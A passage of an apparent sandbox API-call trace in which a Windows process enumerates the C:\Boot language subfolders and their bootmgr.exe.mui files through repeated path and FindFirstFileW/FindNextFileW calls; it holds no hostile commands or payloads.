lpFilePart=0x0) returned 0xd [0154.571] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\", lpFilePart=0x0) returned 0xe [0154.571] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.572] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.572] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.572] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.572] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.573] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR", lpFilePart=0x0) returned 0xd [0154.573] GetFullPathNameW (in: lpFileName="C:\\Boot\\ko-KR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ko-KR\\", lpFilePart=0x0) returned 0xe [0154.573] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.573] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.573] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.573] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.573] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.573] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0154.573] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\", lpFilePart=0x0) returned 0xe [0154.573] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.574] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.574] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.574] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.574] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.576] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO", lpFilePart=0x0) returned 0xd [0154.576] GetFullPathNameW (in: lpFileName="C:\\Boot\\nb-NO\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nb-NO\\", lpFilePart=0x0) returned 0xe [0154.576] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.576] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.576] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.576] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.576] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.576] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0154.576] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\", lpFilePart=0x0) returned 0xe [0154.576] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.577] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.577] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.577] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.577] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.578] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL", lpFilePart=0x0) returned 0xd [0154.578] GetFullPathNameW (in: lpFileName="C:\\Boot\\nl-NL\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\nl-NL\\", lpFilePart=0x0) returned 0xe [0154.578] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.578] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.578] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.578] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.578] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.578] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.578] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0154.578] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\", lpFilePart=0x0) returned 0xe [0154.578] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.579] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.579] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.579] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.579] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.579] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL", lpFilePart=0x0) returned 0xd [0154.579] GetFullPathNameW (in: lpFileName="C:\\Boot\\pl-PL\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pl-PL\\", lpFilePart=0x0) returned 0xe [0154.579] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.579] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.579] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.579] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.579] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.580] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0154.580] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\", lpFilePart=0x0) returned 0xe [0154.580] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.580] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.581] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.581] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: 